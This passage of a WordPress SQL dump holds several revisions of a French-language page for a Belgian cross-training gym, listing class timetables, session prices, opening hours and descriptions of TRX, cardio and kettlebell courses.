calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:32:37', '2013-07-03 16:32:37', '', 11, 'http://www.crosstrainingcenter.be/?p=168', 0, 'revision', '', 0),
(172, 1, '2013-07-03 16:35:39', '2013-07-03 16:35:39', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:35:39', '2013-07-03 16:35:39', '', 11, 'http://www.crosstrainingcenter.be/?p=172', 0, 'revision', '', 0),
(187, 1, '2013-07-03 17:33:38', '2013-07-03 17:33:38', '<h2>Team Training :</h2>\r\n<h4>\r\nEn semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:33:38', '2013-07-03 17:33:38', '', 11, 'http://www.crosstrainingcenter.be/?p=187', 0, 'revision', '', 0),
(174, 1, '2013-07-03 16:43:44', '2013-07-03 16:43:44', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:43:44', '2013-07-03 16:43:44', '', 11, 'http://www.crosstrainingcenter.be/?p=174', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(175, 1, '2013-07-03 16:49:05', '2013-07-03 16:49:05', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; 